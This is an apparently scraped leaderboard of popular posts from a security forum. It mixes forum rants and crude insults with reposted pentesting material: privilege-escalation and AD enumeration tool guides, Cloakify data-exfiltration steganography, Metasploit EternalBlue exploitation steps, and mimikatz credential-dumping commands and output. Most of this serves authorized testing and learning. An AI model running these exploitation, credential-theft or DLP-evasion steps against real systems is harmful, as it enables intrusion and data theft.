Leaderboard


Popular Content

Showing content with the highest reputation since 07/19/19 in all areas

  1. 11 points
    https://www.politiaromana.ro/ro/copii-disparuti 17 missing children. https://www.politiaromana.ro/ro/persoane-disparute 350 missing adults. Nobody cares that there's no way to find out about them unless you visit those pages. But one case shows up on TV, on the flashy shows meant to grab idiots' attention, and the whole country is up in arms about how the system doesn't work. And absolutely all you manage to do is stir a pot of shit that will never lead anywhere. You turn the same stale ideas over and over to give the impression that you actually care, with no result whatsoever. It's the same in absolutely every case. Let's suppose all the hackers in the universe "mobilize" and find that girl. What has been solved? They saved one life, what about the other 367? How do you decide which case is more urgent to solve? Why mobilize hackers for a problem that isn't theirs to solve? Don't those hackers have their own jobs and problems? Who manages the hackers so that they work as efficiently as possible? And we're only talking about the field of missing persons here. Just imagine how many people have other kinds of urgent problems in other fields. That's why organizations like the police, hospitals, the army and so on came about: so they can mobilize, so they already have an answer to those questions, and so they can do their job. And let's suppose a miracle happens anyway, the hackers mobilize and solve the case; what about the underlying problem, namely that a system set up to solve exactly these problems doesn't work? Why isn't anyone protesting against it? Maybe because, as a nation, we're aware that nobody would be able to do a better job? Or maybe we just don't care beyond a silly thought experiment like the one people like you are indulging in right now. There's no point in focusing everyone's attention on one particular thing, least of all the attention of people who don't work in that field, because all you'd end up with is a clone of the current system. What's the point of reinventing the wheel?
    The only option is to push for fixing the problems in the sectors that are responsible for them. On another note, why are there people like you who can't conceive that something cannot be solved? Here's a statistic on last year's murders in Romania; imagine how many are still unsolved. Sure, the utopian situation where everyone mobilizes to solve one specific thing always comes up in the discussion, but how many times has that happened throughout history? And, above all, in which universe is that even possible? It's just an idea thrown to the wind by shit-eaters to generate views for blogs and TV shows. BREAKING NEWS: reality is ugly, murders happen that won't be solved in time, everybody has problems to solve, and the flashy shows make money from their viewer numbers and end at a predefined hour, so how much do they really care about what's actually going on, if at the end of the hour the show ends and a comedy movie starts?! Food for thought.
  2. 8 points
    After doing work for peanuts, you get scammed on top of it. Well done, that's what you deserve.
  3. 6 points
    You're a gay. You're a gay girl. You've got brown undies.
  4. 6 points
  5. 6 points
    Man, I've been following this forum from the shadows for a while, I haven't posted anymore. But how messed up can you guys be? Does this stupidity of yours have no limits? What database, man, that one had people from the 90s in it. 80% of the people in that database are dead. All you dream about is filelist invites, codes, dorks and databases. You wouldn't do anything for your own future. You have people here who are Linux gurus, who know Python and other useful things, and you're asking for databases.
  6. 6 points
  7. 6 points
  8. 6 points
    I think that one is your brother from here :))) kfollow and the other 20 nicknames
  9. 5 points
    Source: https://github.com/blaCCkHatHacEEkr/PENTESTING-BIBLE/blob/master/README.md PENTESTING-BIBLE hundreds of ethical hacking & penetration testing & red team & cyber security & computer science resources. MORE THAN 1000 LINK MORE TO COME
  10. 5 points
    PDF Link : https://github.com/blackorbird/APT_REPORT/blob/master/exploit_report/%23bluekeep RDP from patch to remote code execution.pdf
  11. 5 points
    Check Point Software Technologies issued a report today that detailed how its security researchers were able to remotely install malware on a digital DSLR camera. Ransomware has become a major threat to computer systems in recent years, as high-profile attacks have locked users out of personal computers, hospitals, city governments, and even The Weather Channel. Now, security researchers have discovered another device that might be at risk: a DSLR camera. In the report, researcher Eyal Itkin found that a hacker can easily plant malware on a digital camera. He says that the standardized Picture Transfer Protocol is an ideal method for delivering malware: it's unauthenticated and can be used with both Wi-Fi and USB. The report notes that an individual with an infected Wi-Fi access point could deploy it at a tourist destination to pull off an attack, or infect a user's PC. Reference Link: https://www.blackhatethicalhacking.com/dslr-cameras-vulnerable-to-ransomware-attack/
  12. 5 points
    Security Tool Chest. Anticipating and mitigating security threats is critical during software development. This paper details and investigates security vulnerabilities and mitigation strategies to help software developers build secure applications and prevent operating system leaks. It examines common vulnerabilities and provides relevant mitigation strategies from several relevant perspectives. The paper aims to encompass the Cyber Kill Chain as part of the five compromise stages, displaying relevant tools, books and strategies at each stage. Contents: Reconnaissance, Weaponization, Delivery, Command and Control, Lateral Movement, Establish Foothold, Escalate Privileges, Data Exfiltration, DLL Architecture, References. Reference Link: https://github.com/jmscory/Security-Tool-Chest/blob/master/README.md#reconnaissance
  13. 5 points
    I've added support for Windows x64, Linux x86 and Linux x64. https://www.defcon.org/html/defcon-27/dc-27-demolabs.html#Shellcode Compiler
  14. 5 points
  15. 5 points
    BeRoot is a post-exploitation tool to check for common misconfigurations which can allow an attacker to escalate their privileges. The main goal of BeRoot is to print only the information that has been found as a possible way for privilege escalation, rather than a configuration assessment of the host that lists all services, all processes, all network connections, etc. This project works on Windows, Linux, and Mac OS. But in this demonstration, we will be working on Ubuntu Desktop.

    Downloading BeRoot
    It can be downloaded in Kali Linux with the following command:
    git clone https://github.com/AlessandroZ/BeRoot.git
    Once the download completes, make sure you have python3 installed as it is a pre-requisite for running it. You need to navigate to its downloaded directory to run it.

    Running BeRoot
    We will first look at the help output:
    python3 beroot.py -h
    So it seems that this is the type of tool which runs directly, with no necessary information in the help option. So I will run it directly in the host's shell:
    python3 beroot.py
    Now, it will try to analyze all the possible loopholes which could lead to the escalation of privileges using SUID binaries, checking file permissions, sudo rules, NFS squashing, docker, and kernel exploits. As you can observe now, it is showing the output of the configurations that could lead to the exploitation of privileges. So far I will check with one of the commands which BeRoot had shown in the results, to see whether it is working or not. It worked successfully; it will also show other output commands and exploits according to the operating system in the results.
    Source: https://latesthackingnews.com/2019/08/02/beroot-a-post-exploitation-privilege-escalation-tool/
  16. 5 points
    Hackforums is a shithole full of horny pre-teens and shitheads selling "how to make money" ebooks. RST has more standing than worthless junk like that. The Hackforums admin is aware of this, which is why he added paid ranks and all sorts of such nonsense, because the kids fall for it and want a high rank, like on Metin, to be virtual big shots.
  17. 5 points
    Maday.conf ( https://www.mayday-conf.com ) is the first international cyber security conference in Cluj Napoca (24-25 October) and RST is a community partner of the event. This event was born out of a passion for security and aims first of all to help develop the people who are interested in this field. During the event there will be presentations on the latest techniques used by pentesters and by Incident Responders, as well as things like identifying the TTPs used by attackers. Moreover, the event will feature CTFs with prizes, cyber exercises and workshops. To receive real-time notifications you can subscribe to the newsletter on www.mayday-conf.com, follow the Facebook page ( https://www.facebook.com/MayDayCon ) / Twitter ( https://twitter.com/ConfMayday) or join the Slack group ( https://maydayconf.slack.com/join/shared_invite/enQtNTc5Mzk0NTk0NTk3LWVjMTFhZWM2MTVlYmQzZjdkMDQ5ODI1NWM3ZDVjZGJkYjNmOGUyMjAxZmQyMDlkYzg5YTQxNzRmMmY3NGQ1MGM) Now for the surprise... Because "sharing is caring", the organizers are offering RST members 10 access vouchers for both days. These can be obtained via a private message to Nytro (including an email address) by 1 September, and the selection will be made based on the following criteria:
    - number of posts on the forum
    - number of likes and upvotes received on posts
    - projects published on the forum
    - seniority on RST
    URL: https://www.mayday-conf.com
  18. 5 points
  19. 4 points
  20. 4 points
    LDAPDomainDump
    Active Directory information dumper via LDAP

    Introduction
    In an Active Directory domain, a lot of interesting information can be retrieved via LDAP by any authenticated user (or machine). This makes LDAP an interesting protocol for gathering information in the recon phase of a pentest of an internal network. A problem is that data from LDAP often is not available in an easy to read format. ldapdomaindump is a tool which aims to solve this problem, by collecting and parsing information available via LDAP and outputting it in a human readable HTML format, as well as machine readable json and csv/tsv/greppable files.

    The tool was designed with the following goals in mind:
    - Easy overview of all users/groups/computers/policies in the domain
    - Authentication both via username and password, as with NTLM hashes (requires ldap3 >=1.3.1)
    - Possibility to run the tool with an existing authenticated connection to an LDAP service, allowing for integration with relaying tools such as impacket's ntlmrelayx

    The tool outputs several files containing an overview of objects in the domain:
    - domain_groups: List of groups in the domain
    - domain_users: List of users in the domain
    - domain_computers: List of computer accounts in the domain
    - domain_policy: Domain policy such as password requirements and lockout policy
    - domain_trusts: Incoming and outgoing domain trusts, and their properties
    As well as two grouped files:
    - domain_users_by_group: Domain users per group they are member of
    - domain_computers_by_os: Domain computers sorted by Operating System

    Dependencies and installation
    Requires ldap3 > 2.0 and dnspython. Both can be installed with pip install ldap3 dnspython. The ldapdomaindump package can be installed with python setup.py install from the git source, or for the latest release with pip install ldapdomaindump.

    Usage
    There are 3 ways to use the tool:
    - With just the source, run python ldapdomaindump.py
    - After installing, by running python -m ldapdomaindump
    - After installing, by running ldapdomaindump
    Help can be obtained with the -h switch:

    usage: ldapdomaindump.py [-h] [-u USERNAME] [-p PASSWORD] [-at {NTLM,SIMPLE}]
                             [-o DIRECTORY] [--no-html] [--no-json] [--no-grep]
                             [--grouped-json] [-d DELIMITER] [-r] [-n DNS_SERVER] [-m]
                             HOSTNAME

    Domain information dumper via LDAP. Dumps users/computers/groups and
    OS/membership information to HTML/JSON/greppable output.

    Required options:
      HOSTNAME              Hostname/ip or ldap://host:port connection string to
                            connect to (use ldaps:// to use SSL)

    Main options:
      -h, --help            show this help message and exit
      -u USERNAME, --user USERNAME
                            DOMAIN\username for authentication, leave empty for
                            anonymous authentication
      -p PASSWORD, --password PASSWORD
                            Password or LM:NTLM hash, will prompt if not specified
      -at {NTLM,SIMPLE}, --authtype {NTLM,SIMPLE}
                            Authentication type (NTLM or SIMPLE, default: NTLM)

    Output options:
      -o DIRECTORY, --outdir DIRECTORY
                            Directory in which the dump will be saved (default: current)
      --no-html             Disable HTML output
      --no-json             Disable JSON output
      --no-grep             Disable Greppable output
      --grouped-json        Also write json files for grouped files (default: disabled)
      -d DELIMITER, --delimiter DELIMITER
                            Field delimiter for greppable output (default: tab)

    Misc options:
      -r, --resolve         Resolve computer hostnames (might take a while and cause
                            high traffic on large networks)
      -n DNS_SERVER, --dns-server DNS_SERVER
                            Use custom DNS resolver instead of system DNS (try a
                            domain controller IP)
      -m, --minimal         Only query minimal set of attributes to limit memmory usage

    Options

    Authentication
    Most AD servers support NTLM authentication. In the rare case that it does not, use --authtype SIMPLE.

    Output formats
    By default the tool outputs all files in HTML, JSON and tab delimited output (greppable). There are also two grouped files (users_by_group and computers_by_os) for convenience. These do not have a greppable output. JSON output for grouped files is disabled by default since it creates very large files without any data that isn't present in the other files already.

    DNS resolving
    An important option is the -r option, which decides if a computer's DNSHostName attribute should be resolved to an IPv4 address. While this can be very useful, the DNSHostName attribute is not automatically updated. When the AD Domain uses subdomains for computer hostnames, the DNSHostName will often be incorrect and will not resolve. Also keep in mind that resolving every hostname in the domain might cause a high load on the domain controller.

    Minimizing network and memory usage
    By default ldapdomaindump will try to dump every single attribute it can read to disk in the .json files. In large networks, this uses a lot of memory (since group relationships are currently calculated in memory before being written to disk). To dump only the minimal required attributes (the ones shown by default in the .html and .grep files), use the --minimal switch.

    Visualizing groups with BloodHound
    LDAPDomainDump includes a utility that can be used to convert ldapdomaindump's .json files to CSV files suitable for BloodHound. The utility is called ldd2bloodhound and is added to your path upon installation. Alternatively you can run it with python -m ldapdomaindump.convert or with python ldapdomaindump/convert.py if you are running it from the source. The conversion tool will take the users/groups/computers/trusts .json files and convert those to group_membership.csv and trust.csv which you can add to BloodHound.

    License
    MIT
    Source: https://github.com/dirkjanm/ldapdomaindump
  21. 4 points
    How To Scan Vulnerabilities With Nmap NSE?
    Nmap is a very popular and powerful network-scanning tool, used by all the hackers, script kiddies, pentesters, security researchers... in this world. Nmap is compatible with Windows, BSD, Mac OS X and Linux.

    Scan vulnerabilities with vulscan
    vulscan is an Nmap module which turns Nmap into a vulnerability scanner. The nmap option -sV enables version detection per service, which is used to determine potential flaws according to the identified product. The data is looked up in an offline version of VulDB.

    Scan vulnerabilities with nmap-vulners
    nmap-vulners is an NSE script using the vulnerability database from Vulners.com to detect vulnerabilities on the target.

    Reference Link: https://githacktools.blogspot.com/2019/08/how-to-scan-vulnerabilities-with-nmap-nse.html?fbclid=IwAR1VFZn5MOmZGS0kcNUBU1-VkXK0IfRsPbeDIwQYKsXt91xbyTr-LHj0IXk
  22. 4 points
    For a bit of fun and to tickle your paranoia: https://iknowwhatyoudownload.com/en/peer/ (only works with IPv4). My opinion (totally uninformed and devoid of any trace of importance): if you really want to have no problems, you rent a server in a datacenter located in a country with more relaxed legislation in this respect (ideally that company's headquarters would also be in such a country), and you keep the torrent client there. And from there you fetch the files over ssh (scp/sftp). If what I described above sounds too complicated, another suggestion would be to:
    - disable in your torrent client any method of discovering peers/seeds other than the tracker
    - enable only secure/encrypted connections (although I'm not sure what impact that would have on seed/peer availability)
    DISCLAIMER: I'm Romanian. Although I (probably) don't know what this is about, I have a strong opinion, I'm sure my opinion is the absolute truth, and my goal in life, given from the Heavens, is to convince the rest of the world of my truth.
  23. 4 points
    We don't allow illegal things on the forum, such as gaining access to certain sites or Facebook pages/profiles. Besides, hackforums is garbage.
  24. 4 points
    You'd like to confront your girlfriend if she's cheating on you, but first you'd like to violate her privacy to make sure. Possible scenarios:
    - If you find out she's cheating, at the level of cuckery you're displaying, most likely you won't say anything and you'll act like an all-knowing god in every future conversation with her, burning her passive-aggressively until she gets rid of you and your weird habits.
    - If you find out she's not cheating, you're a shithead who reads other people's conversations out of his own insecurity and weakness.
    Wouldn't it be better to ask her directly? Anyway, at this level of jealousy it won't be the last time you try this kind of shit. At least you'll toughen up and build more tolerance for the next relationship.
  25. 4 points
    32/64 bits version Sharing is caring Download link : https://mega.nz/?fbclid=IwAR3DhN9QsjIrDsdGHq-HQPjh15ghzefhx28wUUBZ0UGdeTyfhmutezFclSQ#F!8xh1EIyI!5cZd5_e-LI4Akw7YVYoBNA
  26. 4 points
    A Red-Teamer diaries
    This is publicly accessible personal notes about my pentesting/red teaming experiments in a controlled environment that involve playing with various tools and techniques used by penetration testers, red teams and advanced adversaries. Project in progress.

    Intrusion Kill Chain

    Mapping the Network

    RunFinger.py
    Gather information about the Domain name and windows machine running in the network
    bash$ cd /usr/share/Responder/tools
    bash$ sudo python RunFinger.py -i 192.168.1.1/24
    or
    bash$ responder-RunFinger

    Nbtscan
    Scanning IP networks for NetBIOS name information.
    bash$ sudo nbtscan -v -s : 192.168.1.0/24

    Crackmapexec v 4.0
    Scan the network range based on the SMB information
    bash$ cme smb 192.168.1.1/24

    Nmap scan
    Scan all the machines in the network and save the outputs.
    -oA option: output in all formats
    -T4: Fast scan
    Fast Scan
    bash$ nmap -p 1-65535 -sV -sS -T4 -oA output target_IP
    Intensive Scan (Not recommended):
    bash$ nmap -p 1-65535 -Pn -A -oA output target_IP
    Scan with enumeration of the running services' version:
    -sC: Safe Scan
    -sV: Get the service version
    bash$ nmap -sC -sV -oA output target

    Angry IP scanner
    Download the tool from this link: Angry IP Scanner
    Change the preferences settings:
    Go to: Preferences -> Ports -> add 80,445,554,21,22 in the port selection
    Go to: Preferences -> Display -> select Alive Hosts
    Go to: Preferences -> Pinging -> select Combined (UDP/TCP)

    Lateral Movement and Exploiting

    Scanning for EternalBlue ms17-010
    bash$ nmap -p445 --script smb-vuln-ms17-010 <target>/24
    If the target is vulnerable the output is as follows:
    Script Output
    Host script results:
    | smb-vuln-ms17-010:
    |   VULNERABLE:
    |   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
    |     State: VULNERABLE
    |     IDs:  CVE:CVE-2017-0143
    |     Risk factor: HIGH
    |       A critical remote code execution vulnerability exists in Microsoft SMBv1
    |       servers (ms17-010).
    |
    |     Disclosure date: 2017-03-14
    |     References:
    |       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
    |       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
    |_      https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/

    Exploiting Eternal Blue - Metasploit Module (Windows 7 x64 only)
    Note: The default Module supported by Metasploit is exploiting only Windows 7 x64 bit. Otherwise the target will be crashed.
    msf > use exploit/windows/smb/ms17_010_eternalblue
    msf exploit(ms17_010_eternalblue) > show targets
    ...targets...
    msf exploit(ms17_010_eternalblue) > set TARGET <target-id>
    msf exploit(ms17_010_eternalblue) > show options
    ...show and set options...
    msf exploit(ms17_010_eternalblue) > exploit

    Mimikatz - Metasploit
    After obtaining a meterpreter shell, we need to ensure that our session is running with SYSTEM level privileges for Mimikatz to function properly.
    meterpreter > getuid
    Server username: WINXP-E95CE571A1\Administrator
    meterpreter > getsystem
    ...got system (via technique 1).
    meterpreter > getuid
    Server username: NT AUTHORITY\SYSTEM

    Reading Hashes and Passwords from Memory
    meterpreter > load mimikatz
    Loading extension mimikatz...success.
    meterpreter > msv
    [+] Running as SYSTEM
    [*] Retrieving msv credentials
    msv credentials
    ===============
    AuthID   Package    Domain            User               Password
    ------   -------    ------            ----               --------
    0;78980  NTLM       WINXP-E95CE571A1  Administrator      lm{ 00000000000000000000000000000000 }, ntlm{ d6eec67681a3be111b5605849505628f }
    0;996    Negotiate  NT AUTHORITY      NETWORK SERVICE    lm{ aad3b435b51404eeaad3b435b51404ee }, ntlm{ 31d6cfe0d16ae931b73c59d7e0c089c0 }
    0;997    Negotiate  NT AUTHORITY      LOCAL SERVICE      n.s. (Credentials KO)
    0;56683  NTLM                                            n.s. (Credentials KO)
    0;999    NTLM       WORKGROUP         WINXP-E95CE571A1$  n.s. (Credentials KO)
    meterpreter > kerberos
    [+] Running as SYSTEM
    [*] Retrieving kerberos credentials
    kerberos credentials
    ====================
    AuthID   Package    Domain            User               Password
    ------   -------    ------            ----               --------
    0;999    NTLM       WORKGROUP         WINXP-E95CE571A1$
    0;997    Negotiate  NT AUTHORITY      LOCAL SERVICE
    0;56683  NTLM
    0;996    Negotiate  NT AUTHORITY      NETWORK SERVICE
    0;78980  NTLM       WINXP-E95CE571A1  Administrator      SuperSecretPassword
    meterpreter > mimikatz_command -f sekurlsa::searchPasswords
    [0] { Administrator ; WINXP-E95CE571A1 ; SuperSecretPassword }
    meterpreter > mimikatz_command -f sekurlsa::logonpasswords
    And many more... enjoy
    Download Link: https://github.com/ihebski/A-Red-Teamer-diaries?fbclid=IwAR2QfukPc5Eev-jwMpX28e4s6tOQ4uHYGkTRWdClv2ZQVHEqT8g7BksjSMI
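The smb-vuln-ms17-010 script output quoted in the notes above is the same text a defender gets back from scanning their own range; as an added example that is not part of the A-Red-Teamer-diaries notes, the Python below turns nmap normal (-oN) output into the list of hosts whose script state is VULNERABLE, i.e. the MS17-010 patch/isolation list. The scan text, the RFC 1918 addresses and the hostname are constructed.

```python
import re

# Markers of nmap "normal" output; only the script-name line has exactly one
# space after the bar, which keeps "|   VULNERABLE:" from being taken as a script.
HOST_RE = re.compile(
    r"^Nmap scan report for (?:(?P<name>\S+) \()?(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\)?")
SCRIPT_RE = re.compile(r"^\| (?P<script>[\w-]+):\s*$")
STATE_RE = re.compile(r"^\|\s+State:\s*(?P<state>\S+)")
IDS_RE = re.compile(r"^\|\s+IDs:\s*(?P<ids>.+?)\s*$")


def parse_smb_vuln_ms17_010(text: str) -> list:
    """One dict per host that produced smb-vuln-ms17-010 output:
    {"host": ip, "name": hostname or None, "state": ..., "cves": [...]}."""
    findings, current, in_script = [], None, False
    host, name = None, None
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:                                   # new host: reset script state
            host, name, in_script = m.group("ip"), m.group("name"), False
            continue
        if host is None:
            continue
        m = SCRIPT_RE.match(line)
        if m:                                   # start of some script's block
            in_script = m.group("script") == "smb-vuln-ms17-010"
            if in_script:
                current = {"host": host, "name": name, "state": None, "cves": []}
                findings.append(current)
            continue
        if not in_script:
            continue
        m = STATE_RE.match(line)
        if m:
            current["state"] = m.group("state")
        m = IDS_RE.match(line)
        if m:                                   # "IDs:  CVE:CVE-2017-0143" -> CVE-2017-0143
            current["cves"] = [tok.split(":", 1)[1] for tok in m.group("ids").split()
                               if tok.startswith("CVE:")]
        if line.startswith("|_"):               # "|_" marks the block's last line
            in_script = False
    return findings


def hosts_needing_ms17_010_patch(text: str) -> list:
    """Sorted IPs whose script state is VULNERABLE: the remediation list."""
    return sorted({f["host"] for f in parse_smb_vuln_ms17_010(text)
                   if f["state"] == "VULNERABLE"})


# Constructed sample scan: first host carries the script block quoted in the
# notes, second host (patched) produced no script output at all.
SAMPLE_SCAN = """\
# Nmap scan initiated (constructed sample) as: nmap -p445 --script smb-vuln-ms17-010 -oN scan.txt 192.168.1.0/24
Nmap scan report for 192.168.1.5
Host is up (0.0010s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|       servers (ms17-010).
|
|     Disclosure date: 2017-03-14
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_      https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/

Nmap scan report for fileserver.corp.example (192.168.1.7)
Host is up (0.0020s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

# Nmap done (constructed sample): 2 IP addresses (2 hosts up)
"""

if __name__ == "__main__":
    for finding in parse_smb_vuln_ms17_010(SAMPLE_SCAN):
        print(finding)
    print("patch list:", hosts_needing_ms17_010_patch(SAMPLE_SCAN))
```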
  27. 4 points
    Pretty quiet around here
  28. 3 points
    Hi, are you lost?
  29. 3 points
    website-checks
    website-checks checks websites with multiple services. These are currently:
    - crt.sh
    - CryptCheck
    - HSTS Preload List
    - HTTP Observatory
    - Lighthouse
    - PageSpeed Insights
    - Security Headers
    - SSL Decoder
    - SSLLabs
    - webbkoll
    - webhint

    Installation
    npm i -g danielruf/website-checks
    yarn global add danielruf/website-checks

    Usage
    website-checks example.com

    Change output directory
    website-checks example.com --output pdf
    would save all PDF files to the local pdf directory.

    CLI flags
    By default all checks (except --ssldecoder) will run. If you want to run only specific checks you can add CLI flags. Currently the following CLI flags will run the matching checks:
    --crtsh --cryptcheck --hstspreload --httpobservatory --lighthouse --psi --securityheaders --ssldecoder --ssldecoder-fast --ssllabs --webbkoll --webhint
    For example
    website-checks example.com --lighthouse --securityheaders
    will run the Lighthouse and Security Headers checks.

    Known issues
    Missing Chrome / Chromium dependency for Windows binary (.exe)
    On Windows it may happen that the bundled binary throws the following error:
    UnhandledPromiseRejectionWarning: Error: Chromium revision is not downloaded. Run "npm install" or "yarn install" at Launcher.launch
    This is a known issue with all solutions like pkg and nexe and expected, as Chromium is not bundled with the binary, which would make it much bigger. In most cases it should be solved by globally installing puppeteer or by having Chrome or Chromium installed and in PATH.
    Source: https://github.com/DanielRuf/website-checks
  30. 3 points
    Hi, although it shows up quite a lot in references on the forum: https://rstforums.com/forum/search/?q=Samsclass.info , I only paid attention to it recently, when I had something to do related to Android. There are a lot of useful resources, so you have plenty to learn from: https://samsclass.info/ Good luck!
  31. 3 points
    I think it would be useful to start using your brain.
  32. 3 points
    Synopsis: Following the wrong link could allow remote attackers to control your WiFi router, Google Home, Roku, Sonos speakers, home thermostats and more. Link: https://medium.com/@brannondorsey/attacking-private-networks-from-the-internet-with-dns-rebinding-ea7098a2d325 I know the subject is pretty "stale", but I found the article interesting.
  33. 3 points
    Cloakify Factory is a tool that transforms any file type into a list of harmless and even useless-looking strings. This ability allows you to hide a data file in plain sight and also transfer it over the network without triggering malware alerts. The functionality which Cloakify utilizes is called text-based steganography, which protects the data by making it look benign. The cloaked files defeat signature-based malware detection tools, DLP, etc. In this demonstration, we will be working on Kali Linux.

    Downloading Cloakify
    It can be downloaded in Kali Linux with the following command:
    git clone https://github.com/TryCatchHCF/Cloakify.git
    Once the download completes, make sure you have python2.7 installed as it is a pre-requisite for running it. You need to navigate to its downloaded directory to run it.

    Running Cloakify
    Let's run the tool with the following command:
    python cloakifyFactory.py
    So as it seems, Cloakify Factory is a menu-driven tool that leverages its script set. When you choose a file to Cloakify, it first Base64-encodes it, then applies a cipher to generate a list that encodes the Base64 payload. And then the cloaked data can be transferred to your desired destination. Let's start by cloakifying the file which contains the data you can see below. Now I will encode this data. Now that the data is encoded, I will check my output data file which was processed by Cloakify. As the data is encoded and exfiltrated, choose Decloakify with the same cipher to decode the payload. Now check whether the data reverted to its original state or not. It worked successfully, as all the data got converted back to its actual state.
    Source: https://latesthackingnews.com/2019/07/30/cloakify-a-tool-to-mask-your-data-in-plain-sight/
  34. 3 points
    Hi, for reasons I will explain later, let's say my name is "Four"; the reason for this name, again, will be revealed a bit later. Well, that being said, I'll get straight to the point. I need to talk to someone about a certain subject and I thought you'd be the right person. I need a bit of help to solve a problem that has been weighing on me for a few months already... when you have time and think my message is relevant, please reply to me. All the best, Four. #mars
  35. 3 points
    Talk to @jreister in private, he has code for sale exactly for this kind of thing.
  36. 3 points
    I'll give you 10 dollars a week if you read about ElasticSearch and write me a little Python program related to ElasticSearch (1 per week). What do you say?
  37. 3 points
    Acunetix and havij, may the haters die of envy baaaaaaaaaaaaaaaaaaaaaaaaaaa
  38. 3 points
    The first 10 scams are beneficial for your international career. Every cloud has a silver lining. Stop working with Romanians.
  39. 3 points
    welcome and enjoy your stay. Use the search, you'll find plenty of resources
  40. 3 points
    GNU netcat also works for port scanning. It allows a single port, or a range.
    nc -z 127.0.0.1 80 && echo open
    # or
    nc -zv 127.0.0.1 80-1024   # verbose printing
  41. 3 points
    https://haveibeenpwned.com/ It's only for checking whether their email showed up in some public dump. Don't expect to find the passwords too. Those you find only if you get hold of the dumps themselves.
  42. 3 points
    Python API wrapper and command-line client for the tools hosted on spyse.com. "Spyse is a developer of complete DAAS (Data-As-A-Service) solutions for Internet security professionals, corporate and remote system administrators, SSL / TLS encryption certificate providers, data centers and business analysts. All Spyse online solutions are represented by thematic services that have a single platform for collecting, processing and aggregating information." - spyse.com Supports the following APIs: DNStable FindSubdomains CertDB ASlookup PortMap DomainsDB NOTE: This API is currently under active development. Download link : https://github.com/zeropwn/spyse.py?fbclid=IwAR1_N6pGrll9uLx5FnbbbzlCKQnjTAxITpuLlhPNDK50TkAoIeg-ULArq5w
  43. 2 points
    Say Cheese: Ransomware-ing a DSLR Camera August 11, 2019 Research by: Eyal Itkin TL;DR Cameras. We take them to every important life event, we bring them on our vacations, and we store them in a protective case to keep them safe during transit. Cameras are more than just a tool or toy; we entrust them with our very memories, and so they are very important to us. In this blog, we recount how we at Check Point Research went on a journey to test if hackers could hit us in this exact sweet spot. We asked: Could hackers take over our cameras, the guardians of our precious moments, and infect them with ransomware? And the answer is: Yes. Background: DSLR cameras aren’t your grandparents’ cameras, those enormous antique film contraptions you might find up in the attic. Today’s cameras are embedded digital devices that connect to our computers using USB, and the newest models even support WiFi. While USB and WiFi are used to import our pictures from the camera to our mobile phone or PC, they also expose our camera to its surrounding environment. Our research shows how an attacker in close proximity (WiFi), or an attacker who already hijacked our PC (USB), can also propagate to and infect our beloved cameras with malware. Imagine how would you respond if attackers inject ransomware into both your computer and the camera, causing them to hold all of your pictures hostage unless you pay ransom. Below is a Video Demonstration of this attack: Technical Details Picture Transfer Protocol (PTP) Modern DSLR cameras no longer use film to capture and later reproduce images. Instead, the International Imaging Industry Association devised a standardised protocol to transfer digital images from your camera to your computer. This protocol is called the Picture Transfer Protocol (PTP). Initially focused on image transfer, this protocol now contains dozens of different commands that support anything from taking a live picture to upgrading the camera’s firmware. 
Although most users connect their camera to their PC using a USB cable, newer camera models now support WiFi. This means that what was once a PTP/USB protocol that was accessible only to the USB connected devices, is now also PTP/IP that is accessible to every WiFi-enabled device in close proximity. In a previous talk named “Paparazzi over IP” (HITB 2013), Daniel Mende (ERNW) demonstrated all of the different network attacks that are possible for each network protocol that Canon’s EOS cameras supported at the time. At the end of his talk, Daniel discussed the PTP/IP network protocol, showing that an attacker could communicate with the camera by sniffing a specific GUID from the network, a GUID that was generated when the target’s computer got paired with the camera. As the PTP protocol offers a variety of commands, and is not authenticated or encrypted in any way, he demonstrated how he (mis)used the protocol’s functionality for spying over a victim. In our research we aim to advance beyond the point of accessing and using the protocol’s functionality. Simulating attackers, we want to find implementation vulnerabilities in the protocol, hoping to leverage them in order to take over the camera. Such a Remote Code Execution (RCE) scenario will allow attackers to do whatever they want with the camera, and infecting it with Ransomware is only one of many options. From an attacker’s perspective, the PTP layer looks like a great target: PTP is an unauthenticated protocol that supports dozens of different complex commands. Vulnerability in PTP can be equally exploited over USB and over WiFi. The WiFi support makes our cameras more accessible to nearby attackers. In this blog, we focus on the PTP as our attack vector, describing two potential avenues for attackers: USB – For an attacker that took over your PC, and now wants to propagate into your camera. WiFi – An attacker can place a rogue WiFi access point at a tourist attraction, to infect your camera. 
In both cases, the attackers are going after your camera. If they’re successful, the chances are you’ll have to pay ransom to free up your beloved camera and picture files.

Introducing our target

We chose to focus on Canon’s EOS 80D DSLR camera for multiple reasons, including:

- Canon is the largest DSLR maker, controlling more than 50% of the market.
- The EOS 80D supports both USB and WiFi.
- Canon has an extensive “modding” community, called Magic Lantern.

Magic Lantern (ML) is an open-source free software add-on that adds new features to the Canon EOS cameras. As a result, the ML community already studied parts of the firmware, and documented some of its APIs.

Attackers are profit-maximisers: they strive to get the maximum impact (profit) with minimal effort (cost). In this case, research on Canon cameras will have the highest impact for users, and will be the easiest to start, thanks to the existing documentation created by the ML community.

Obtaining the firmware

This is often the trickiest part of every embedded research. The first step is to check if there is a publicly available firmware update file on the vendor’s website. As expected, we found it after a short Google search. After downloading the file and extracting the archive, we had an unpleasant surprise. The file appears to be encrypted / compressed, as can be seen in Figure 1.

Figure 1 – Byte histogram of the firmware update file.

The even byte distribution hints that the firmware is encrypted or compressed, and that whatever algorithm was used was probably a good one. Skimming through the file, we failed to find any useful pattern that could potentially be a hint of the existence of the assembly code for a bootloader. In many cases, the bootloader is uncompressed, and it contains the instructions needed for the decryption / decompression of the file.
